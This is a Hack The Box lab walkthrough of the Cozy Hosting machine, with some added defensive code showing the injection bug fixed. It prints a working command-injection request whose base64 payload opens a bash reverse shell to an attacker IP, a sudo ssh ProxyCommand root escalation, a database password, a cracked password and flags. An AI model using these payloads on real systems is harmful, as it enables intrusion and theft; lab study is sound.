Hack the Box - Cozy Hosting Write Up
Machine Information⌗
- Machine Name: Cozy Hosting
- OS: Linux
- IP Address: 10.10.11.230
- Difficulty: Easy
- Points: 20
- Release Date: 03 Sep 2023
Summary⌗
The machine “Cozy Hosting” on Hack The Box is an easy-level Linux-based challenge with an IP address of 10.10.11.230. It was released on September 3, 2023, and is worth 20 points. This write-up documents the steps taken to exploit the machine and gain both user and root access.
Enumeration⌗
Nmap Scan⌗
$ nmap -sC -sV -oN nmap_scan.txt 10.10.11.230
# Nmap 7.94 scan initiated Sun Sep 3 02:08:26 2023 as: nmap -sC -sV -v -p- -oN nmap/fullhouse.nmap cozyhosting.htb
Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.13s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 72A61F8058A9468D57C3017158769B1F
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 3 02:17:40 2023 -- 1 IP address (1 host up) scanned in 553.26 seconds
As ports 22 and 80 are open and port 80 is serving nginx, I went straight to checking port 80, only to be redirected to the domain cozyhosting.htb.
So I added it to my /etc/hosts file (as root):
echo '10.10.11.230 cozyhosting.htb' >> /etc/hosts
Now we're ready to go!
Endpoint Enumeration⌗
I use feroxbuster for this purpose; the reason is simple: it won't miss any status code by default 🤷♂️
feroxbuster -u http://cozyhosting.htb/ -m GET,POST -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt --no-state --no-recursion -o ferox.out
Right off the bat, I got two interesting endpoints:
401 GET 1l 1w 97c http://cozyhosting.htb/admin
500 GET 1l 1w 73c http://cozyhosting.htb/error
/admin redirects me to /login, so I know that a role feature exists. /error shows the Whitelabel error page, which is the Spring Boot error signature.
Foothold⌗
Phase 1⌗
After a while looking for Spring Boot vulnerabilities, I finally found that Actuator actually has several default endpoints:
- /dump: displays a dump of threads (including a stack trace)
- /trace: displays the last several HTTP messages (which could include session identifiers)
- /logfile: outputs the contents of the log file
- /shutdown: shuts the application down
- /mappings: shows all of the MVC controller mappings
- /env: provides access to the configuration environment
- /actuator: root actuator endpoint
- /restart: restarts the application
- /heapdump: builds and returns a heap dump from the JVM used by our application
Regardless, only one of these is accessible here, which is /actuator.
This endpoint returns a really interesting result:
{
  "_links": {
    "self": {
      "href": "http://localhost:8080/actuator",
      "templated": false
    },
    "sessions": {
      "href": "http://localhost:8080/actuator/sessions",
      "templated": false
    },
    "beans": {
      "href": "http://localhost:8080/actuator/beans",
      "templated": false
    },
    "health": {
      "href": "http://localhost:8080/actuator/health",
      "templated": false
    },
    "health-path": {
      "href": "http://localhost:8080/actuator/health/{*path}",
      "templated": true
    },
    "env": {
      "href": "http://localhost:8080/actuator/env",
      "templated": false
    },
    "env-toMatch": {
      "href": "http://localhost:8080/actuator/env/{toMatch}",
      "templated": true
    },
    "mappings": {
      "href": "http://localhost:8080/actuator/mappings",
      "templated": false
    }
  }
}
The /actuator/sessions endpoint leaks the JSESSIONID of the user kanderson:
{
  "D1444BCCEB4CBEE2EFCB588F405E1F4E": "kanderson"
}
Phase 2⌗
Using kanderson's JSESSIONID, I gained access to /admin.
After testing, I found RCE on /executessh, which gets invoked when I press Submit on the Connection Settings form. To be exact, the code injection happens in the username param.
Here is the raw exploit request:
POST /executessh HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: http://cozyhosting.htb
Connection: close
Referer: http://cozyhosting.htb/admin
Cookie: JSESSIONID=D1444BCCEB4CBEE2EFCB588F405E1F4E
Upgrade-Insecure-Requests: 1
host=10.10.14.64&username=`echo${IFS}YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNjQvOTAwMSAgMD4mMSAg${IFS}|base64${IFS}-d|bash`
And yeah, as you've guessed, I got a foothold as the app user.
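As an added, illustrative example (not the CozyHosting source, which this write-up never shows), here is the shape of the bug behind /executessh next to a hardened version: the hypothetical vulnerable method splices the form fields into a shell command line, while the hypothetical hardened method allow-lists both fields and runs ssh with no shell in between. The class and method names and the exact ssh flags are assumptions.

```java
import java.io.IOException;
import java.util.List;
import java.util.regex.Pattern;

// Illustrative sketch only: class/method names and ssh flags are assumptions,
// not the application's real code.
public class SshConnectionCheck {

    // Vulnerable shape: user input becomes part of a bash command line, so
    // backticks, $(...) and ${IFS} inside "username" are run by the shell,
    // which is exactly what the write-up's request above abuses.
    static Process vulnerable(String host, String username) throws IOException {
        String cmd = "ssh -o ConnectTimeout=3 " + username + "@" + host;
        return Runtime.getRuntime().exec(new String[] {"bash", "-c", cmd});
    }

    // Allow-lists: a POSIX-style user name (no leading '-', so it can never be
    // parsed as an ssh option) and a plain hostname or IPv4 literal.
    private static final Pattern USERNAME = Pattern.compile("^[a-z_][a-z0-9_-]{0,31}$");
    private static final Pattern HOST = Pattern.compile("^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$");

    static boolean isValid(String host, String username) {
        return host != null && username != null
                && USERNAME.matcher(username).matches()
                && HOST.matcher(host).matches();
    }

    // Hardened shape: validate first, then pass each value as its own argv
    // element with no shell involved, so metacharacters are never interpreted.
    static Process hardened(String host, String username) throws IOException {
        if (!isValid(host, username)) {
            throw new IllegalArgumentException("rejected host/username");
        }
        List<String> argv = List.of("ssh", "-o", "ConnectTimeout=3",
                "-o", "BatchMode=yes", username + "@" + host);
        return new ProcessBuilder(argv).start();
    }

    public static void main(String[] args) {
        // Constructed inputs: a benign pair, and a value shaped like the
        // write-up's payload (backticks and ${IFS} separators).
        String injected = "`echo${IFS}cGF5bG9hZA==${IFS}|base64${IFS}-d|bash`";
        System.out.println("benign accepted:    " + isValid("10.10.14.64", "kanderson"));
        System.out.println("injection accepted: " + isValid("10.10.14.64", injected));
    }
}
```

The validation alone would have blocked the payload shown above; dropping the shell entirely is what removes the bug class rather than one instance of it.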
User⌗
Phase 1⌗
The first thing I did was check who has a shell on this box by running this command:
cat /etc/passwd | grep 'sh$'
and got this output:
Now I know there is a user named josh. To escalate to josh, I found a file named cloudhosting-0.0.1.jar under the /app directory.
So I downloaded this file and reverse engineered it with JD-GUI.
Immediately, I found credentials to access PostgreSQL within application.properties:
server.address=127.0.0.1
server.servlet.session.timeout=5m
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled = true
spring.datasource.driver-class-name=org.postgresql.Driver
spring.jpa.database-platform=org.hibernate.dialect.PostgreSQLDialect
spring.jpa.hibernate.ddl-auto=none
spring.jpa.database=POSTGRESQL
spring.datasource.platform=postgres
spring.datasource.url=jdbc:postgresql://localhost:5432/cozyhosting
spring.datasource.username=postgres
spring.datasource.password=Vg&nvzAQ7XxR
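As an added note (not part of the write-up), the two management settings above are what made the session leak possible. A hardened equivalent, which exposes only health over HTTP and moves Actuator to a loopback-only port that the reverse proxy does not forward (assuming nginx only proxies the main app port), looks like this:

```properties
# --- weak (as shipped on the box): session IDs, environment and bean wiring
# are readable by anyone who can reach the app over HTTP
management.endpoints.web.exposure.include=health,beans,env,sessions,mappings
management.endpoint.sessions.enabled=true

# --- hardened: expose only health, keep it non-verbose, disable the sessions
# endpoint, and bind management endpoints to a separate loopback-only port
management.endpoints.web.exposure.include=health
management.endpoint.health.show-details=never
management.endpoint.sessions.enabled=false
management.server.port=8081
management.server.address=127.0.0.1
```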
So I logged in with psql.
Poking around, I found user credentials in cozyhosting.users.
Phase 2⌗
After that, I put the admin hash into hashcat in order to crack it (-m 3200 is hashcat's bcrypt mode):
hashcat -m 3200 -a 0 admin.hash rockyou.txt --status --status-timer 5
Seconds later I got this beautiful output :)
Not wasting time, I went straight to trying manchesterunited to log in as josh.
And yep, it works.
Root⌗
After arriving, the first thing I did was type sudo -l, and to my surprise this is the output:
So I went to GTFOBins, looking for an answer to "what can I do with this?". GTFOBins says:
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. Spawn interactive root shell through ProxyCommand option.
sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
and boom!
Rooted.
Flags⌗
user.txt: 0bac7db525b2905468ee0a11dec6d22c
root.txt: 8c64581bcae854f66dbc66d408108e6b
Conclusion⌗
The Cozy Hosting machine presented an interesting and educational challenge. Initially, a Nmap scan revealed open ports 22 (SSH) and 80 (HTTP) running an Nginx web server. Further investigation led to a redirection to the domain “cozyhosting.htb,” which was added to the /etc/hosts file for easier access.
Endpoint enumeration using Feroxbuster revealed two interesting endpoints: /admin and /error. The Whitelabel error page identified a Spring Boot application, and the exposed Actuator /sessions endpoint leaked a JSESSIONID for the user kanderson.
That session enabled access to the /admin page, where a remote code execution (RCE) vulnerability in the /executessh functionality was triggered via the username parameter, giving an initial foothold as the app user.
Once foothold was established, further enumeration revealed a user named josh. By reverse engineering the “cloudhosting-0.0.1.jar” file and inspecting the PostgreSQL credentials in “application.properties,” it was possible to access the database and retrieve user credentials. Cracking the admin password hash with Hashcat yielded the password “manchesterunited,” allowing access as the josh user.
Finally, the sudo -l command revealed that the sudo ssh command could be exploited to gain root access, and a root shell was successfully obtained.
In conclusion, this machine provided a valuable learning experience in web application vulnerabilities, Linux privilege escalation, and post-exploitation techniques.